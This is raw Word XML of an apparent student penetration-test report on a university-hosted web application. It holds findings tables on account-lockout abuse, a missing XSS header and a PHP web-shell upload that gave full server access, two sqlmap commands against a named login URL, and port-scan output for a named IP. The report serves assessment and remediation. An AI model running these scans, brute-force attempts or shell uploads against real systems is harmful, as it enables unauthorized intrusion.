        <w:pStyle w:val="NoSpacing"/>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25pt">
            <v:imagedata r:id="rId10" o:title="vulnerabilityFound in nikto"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36DD6" w:rsidRDefault="000B252C" w:rsidP="000B252C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="002A4F72">
        <w:noBreakHyphen/>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC \s 1 ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Result of Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E"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C36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">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4F510E" w:rsidTr="002F5F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4F510E" w:rsidRDefault="004F510E" w:rsidP="002F5F82">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability ID:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent5" w:themeTint="99"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004F510E" w:rsidRDefault="004F510E" w:rsidP="002F5F82">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Brute Forcing – Disabling account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F510E" w:rsidTr="002F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100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Brute Forcing – Disabling account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F510E" w:rsidTr="002F5F82">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000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F510E" w:rsidTr="002F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100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>An account allows for three login fails, after which the account is disabled. To recover the account, the owner must contact the administrator. This allows for an attacker to disable many accounts if he brute force usernames (e.g. ‘admin’).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F510E" w:rsidTr="002F5F82">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F510E" w:rsidRDefault="004F510E" w:rsidP="002F5F82">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F510E" w:rsidTr="002F5F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4F510E" w:rsidRDefault="004F510E" w:rsidP="002F5F82">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4F510E" w:rsidRDefault="004F510E" w:rsidP="002F5F82">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Allow the user to more easily recover their account and replace disabling with a time-out</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F510E" w:rsidTr="002F5F82">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4F510E" w:rsidRDefault="004F510E" w:rsidP="002F5F82">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4F510E" w:rsidRDefault="004F510E" w:rsidP="002F5F82">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable7Colorful-Accent51"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D92A2E" w:rsidTr="00D92A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D92A2E" w:rsidRDefault="00D92A2E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability ID:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent5" w:themeTint="99"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Vulnerability check -  HTTP Headers</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XSS Vulnerability revealed by OWASP ZAP</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r>
              <w:t>4</w:t>
            </w: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Web Browser XSS Protection is not enabled, or is disabled by the configuration of the 'X-XSS-Protection' HTTP response header on the web server</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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92A2E" w:rsidTr="00D92A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D92A2E" w:rsidRDefault="00D92A2E">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D92A2E" w:rsidRDefault="00D92A2E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Ensure that the web browser's XSS filter is enabled, by setting the X-XSS-Protection HTTP response header to '1'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92A2E" w:rsidTr="00D92A2E">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D92A2E" w:rsidRDefault="00D92A2E">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D92A2E" w:rsidRDefault="00D92A2E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DA2B33" w:rsidRDefault="00DA2B33"/>
    <w:p w:rsidR="005E6209" w:rsidRDefault="004D6EE7" w:rsidP="005E6209">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:450.7pt;height:253.55pt">
            <v:imagedata r:id="rId11" o:title="OWASP ZAP no major vulnerabilities"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C7BA1" w:rsidRDefault="005E6209" w:rsidP="005E6209">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="002A4F72">
        <w:noBreakHyphen/>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC \s 1 ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Result OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36DD6" w:rsidRDefault="00C36DD6"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable7Colorful-Accent51"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C36DD6" w:rsidTr="00745D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5" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00C36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00745D79">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability ID:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent5" w:themeTint="99"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00C36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00745D79">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Upload malicious files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36DD6" w:rsidTr="00745D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rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerability Title</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100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Upload malicious files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36DD6" w:rsidTr="00745D79">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Severity(1”low”-5”high”)</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000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36DD6" w:rsidTr="00745D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Summary</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100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>We were able to upload a shell as</w:t>
            </w:r>
            <w:r w:rsidR="00B160B0">
              <w:t xml:space="preserve"> a php file on the Cloud server and we got access to the whole server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36DD6" w:rsidTr="00745D79">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Description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36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00745D79">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36DD6" w:rsidTr="00745D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hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00C36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00745D79">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w: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hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00C36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00745D79">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Prevent the malicious files from being uploaded on the server. Also, check for the hidden ones under picture files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36DD6" w:rsidTr="00745D79">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2335" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent5" w:themeTint="99"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00C36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00745D79">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
            <w:tc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tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00C36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00745D79">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C36DD6" w:rsidRDefault="00C36DD6"/>
    <w:p w:rsidR="005E6209" w:rsidRDefault="004D6EE7" w:rsidP="005E6209">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:466.8pt;height:180.7pt">
            <v:imagedata r:id="rId12" o:title="Shell"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14287" w:rsidRDefault="005E6209" w:rsidP="005E6209">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="002A4F72">
        <w:noBreakHyphen/>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC \s 1 ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: File structure of the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A0514" w:rsidRPr="004A0514" w:rsidRDefault="004A0514" w:rsidP="00437351">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc464415750"/>
      <w:r>
        <w:t>Changes on the server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0">
      <w:r>
        <w:t>We uploaded a php file called ruxup.php on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0">
      <w:r>
        <w:t>We analyzed the web application using a couple of kali linux software and we couldn’t find any sql injection or XSS vulnerabilities. Also, we tried to use the sqlmap on a high level and there was no success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:r>
        <w:t>sqlmap -u https://i302477.iris.fhict.nl/SePrWebsite/index.php/sips/sipssys/users/a/admin/user/login_validation.php?userLogin=admin --dbs --level=3 --risk=3 - no vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:r>
        <w:t>sqlmap -u https://i302477.iris.fhict.nl/SePrWebsite/index.php/sips/sipssys/users/a/admin/user/login_validation.php?userPwd=admin --dbs --level=5 --risk=3 --dbms=mysql</w:t>
      </w:r>
      <w:r w:rsidR="00F14287">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>- no vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0"/>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00437351">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc464415751"/>
      <w:r>
        <w:t xml:space="preserve">Other </w:t>
      </w:r>
      <w:r w:rsidRPr="00E455D7">
        <w:t>screenshots</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00495A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using Burp suite. Tried some brute force as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E1A48" w:rsidRDefault="004D6EE7" w:rsidP="003E1A48">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:468pt;height:263.25pt">
            <v:imagedata r:id="rId13" o:title="interceptBurp - add certificate to exception"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="003E1A48" w:rsidP="003E1A48">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="002A4F72">
        <w:noBreakHyphen/>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC \s 1 ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Result of brute force with burp suite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0"/>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sqlmap – no success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E1A48" w:rsidRDefault="004D6EE7" w:rsidP="003E1A48">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:468pt;height:263.25pt">
            <v:imagedata r:id="rId14" o:title="noSQLInjection vulnerability sqlmap"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="003E1A48" w:rsidP="003E1A48">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="002A4F72">
        <w:noBreakHyphen/>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC \s 1 ">
        <w:r w:rsidR="002A4F72">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Result Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0"/>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Zenmap port scan – found some ports opened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Scanning 145.85.4.69 [1000 ports]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 110/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 143/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 995/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 80/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 587/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 993/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 25/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 443/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 21/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 465/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 2222/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 563/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 119/tcp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open port 53/udp on 145.85.4.69</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B160B0" w:rsidRDefault="00B160B0" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Discovered open|filtered port 53/udp on 145.85.4.69 is actually open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A775FC" w:rsidRDefault="00A775FC" w:rsidP="00B160B0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
